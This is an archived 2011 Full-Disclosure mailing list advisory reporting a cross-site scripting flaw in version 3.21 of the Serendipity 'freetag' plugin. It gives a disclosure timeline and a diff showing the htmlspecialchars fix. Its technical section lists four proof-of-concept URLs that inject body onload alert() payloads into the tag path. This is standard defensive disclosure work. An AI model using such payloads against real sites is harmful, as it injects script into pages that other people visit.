lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <4DE513D8.6090700@t-online.de>
Date: Tue, 31 May 2011 18:14:16 +0200
From: "sschurtz@...nline.de" <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Cross-Site Scripting vulnerability in Serendipity
	Plugin "serendipity_event_freetag"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:              Cross-Site Scripting vulnerability in Serendipity
Plugin "serendipity_event_freetag"
Advisory ID:           SSCHADV2011-004
Author:                Stefan Schurtz
Affected Software:     Successfully tested on: Serendipity 1.5.5 with
serendipity_event_freetag - version 3.21
Vendor URL:            http://www.s9y.org
Vendor Status:         Version 3.22 - Fix possible XSS
CVE-ID:                -

==========================
Vulnerability Description:
==========================

This is Cross-Site Scripting vulnerability

==================
Technical Details:
==================

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body
onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body
onload=alert(String.fromCharCode(88,83,83))>

http://www.example.com/serendipity/index.php?/plugin/tag/<body
onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body
onload=alert(String.fromCharCode(88,83,83))>

=========
Solution:
=========

Update to the latest version 3.22

diff serendipity_event_freetag.php

< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30
garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24
garvinhicking Exp $

<  $propbag->add('version',       '3.21');
>  $propbag->add('version',       '3.22');

<  $serendipity['smarty']->assign('freetag_tagTitle',
is_array($this->displayTag) ? implode(' + ',$this->displayTag) :
$this->displayTag);
>  $serendipity['smarty']->assign('freetag_tagTitle',
htmlspecialchars(is_array($this->displayTag) ? implode(' +
',$this->displayTag) : $this->displayTag));

====================
Disclosure Timeline:
====================

30-May-2011 - informed developers
30-May-2011 - Release date of this security advisory
30-May-2011 - Version 3.22 - Fix possible XSS
31-May-2011 - post on BugTraq and Full-disclosure

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.s9y.org
http://www.rul3z.de/advisories/SSCHADV2011-004.txt
http://ha.ckers.org/xss.html
http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html
http://www.securityfocus.com/archive/1/518191/30/0/threaded
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEUEARECAAYFAk3lE9gACgkQg3svV2LcbMCkTQCXaQJI6tF86BjiD39MoyApw7u0
JACfc3zu6QhrU4tKsvR3IVCucPw69sg=
=6mbq
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ